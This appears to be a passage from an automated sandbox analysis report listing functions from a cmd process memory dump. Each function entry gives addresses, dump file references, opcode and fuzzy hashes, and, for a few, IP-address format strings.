                                                                        Function 0313C700 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: 28226276df3254a38d4cd8ec5cd661f890d191e8b8b8e20eddccd1145c6f7920
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: B1C0123A290648AFC712EA98CD01F427BA9EB98B40F000422F2048B670D631E821EA84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03120310 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: 6899f5e034ea4fa9ea01d608f9afc97a7ade4a3921520df9c3738c46bc30ed82
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 2ED01236100248EFCB01DF41C890D9A7B2AFBCC710F108019FD190B7108A31ED62DA90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03100750 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: f90fdc3b2f26249b0075d359c74242cfef9568ebd91845c19424f59acc138fb4
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: ACC04879B01A41CFCF15DB2AD694F8977E8FB48750F1908E0E859CBB21E724E911CA20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142B80 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f6ae942e50ed5765fc279eae585614306a5b411488fa77ddea85574ccc66bba
                                                                        • Instruction ID: 0ee4581aed0c5e5b159c902dab93bc40eff5896130d966b0f6897a5db2b1fc07
                                                                        • Opcode Fuzzy Hash: 4f6ae942e50ed5765fc279eae585614306a5b411488fa77ddea85574ccc66bba
                                                                        • Instruction Fuzzy Hash: CF90023130140C43D104B2588904686000587D4301F55D011BA125655E976589917531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142BA0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd2e9ed4dd9366c4bd03a80d6443dfab16be1374fa305f36a34ef8f5f3867739
                                                                        • Instruction ID: 633f08bbb646c207a977daff8139492dceda3d709d131d4f9e5d0de29af48514
                                                                        • Opcode Fuzzy Hash: cd2e9ed4dd9366c4bd03a80d6443dfab16be1374fa305f36a34ef8f5f3867739
                                                                        • Instruction Fuzzy Hash: A990023170540C43D150B2588514746000587D4301F55D011B4125654D87558B557AA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 651eae46779f9acbf14325ba8855e2c89b3e723a2e5ebdb7bf2e7c636a5a71de
                                                                        • Instruction ID: 41806f419eb96a902d2efdb239a1b805aae54c52ec8648739b3fbbffa068a8e9
                                                                        • Opcode Fuzzy Hash: 651eae46779f9acbf14325ba8855e2c89b3e723a2e5ebdb7bf2e7c636a5a71de
                                                                        • Instruction Fuzzy Hash: F490023130140C43D180B258850464A000587D5301F95D015B4126654DCB158B597BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142BE0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5354173a42fde4046588b719190de4b504e3bbc101ed17b6ca7e2df98c3f295d
                                                                        • Instruction ID: bd83c4d1d5a15aea06165286627aa1d0d3ec1d7b5d0eb5a71f062354ed098360
                                                                        • Opcode Fuzzy Hash: 5354173a42fde4046588b719190de4b504e3bbc101ed17b6ca7e2df98c3f295d
                                                                        • Instruction Fuzzy Hash: 5290023130544C83D140B2588504A46001587D4305F55D011B4165694D97258E55BA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 492614d1faa00ea9ce0889c6f85434bf18bca2f8cecfa6f71c0651a97b4905ff
                                                                        • Instruction ID: bef474f13fc152b42c782acfb48291cfd1057a62366cc2b6be0a195cc1000b71
                                                                        • Opcode Fuzzy Hash: 492614d1faa00ea9ce0889c6f85434bf18bca2f8cecfa6f71c0651a97b4905ff
                                                                        • Instruction Fuzzy Hash: 829002A1301544D34500F358C504B0A450587E4201B55D016F5155560CC72589519535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: ef9bd0a4a83f91995d510a361bc874aefee82a8acbca9decaf398b59ed99de3c
                                                                        • Instruction ID: d991d5bb887df1395e1b0127ed2ea9116a968714bcbbef313a158dcc86489209
                                                                        • Opcode Fuzzy Hash: ef9bd0a4a83f91995d510a361bc874aefee82a8acbca9decaf398b59ed99de3c
                                                                        • Instruction Fuzzy Hash: 0D51F5B5A00645AFCB34DF9CC8909FFB7FDAB4C200B048899E5A5C7A41D7B4DA458760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                        • Instruction ID: 61af11a5a008ec1c4fb504ad2fc89500687b6193fabed8830aa93b4a5359fd25
                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                        • Instruction Fuzzy Hash: 0E021575608341AFC309CF18C890A6BFBE5EFC9714F448A2DF9899B264DB31E945CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: 913ea494874a3a2c50b80ea45bc3c15f1d918670924d7214d12c639ef7598f31
                                                                        • Instruction ID: 042bccfcf4111f73343112ee42b55af3003b7ff1d3647dc030bf52e754d545ac
                                                                        • Opcode Fuzzy Hash: 913ea494874a3a2c50b80ea45bc3c15f1d918670924d7214d12c639ef7598f31
                                                                        • Instruction Fuzzy Hash: E8213276A00219AFDB10DF79DC40AEFB7F8EF5C654F480556E915E7200E731DA068BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: 2a990c8f3d7b64ab28cce6282c841e090423b0af2b9233bd4b4fc526ba2b1694
                                                                        • Instruction ID: d072355237d87d6ea9c18928346bc3b58a5dc2d0646efe0a5661bf5497332b5c
                                                                        • Opcode Fuzzy Hash: 2a990c8f3d7b64ab28cce6282c841e090423b0af2b9233bd4b4fc526ba2b1694
                                                                        • Instruction Fuzzy Hash: 12315A76A106199FCB20DF69DC40BEEB7F8EF4C650F544555E849D7140EB30DA4A8B70
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%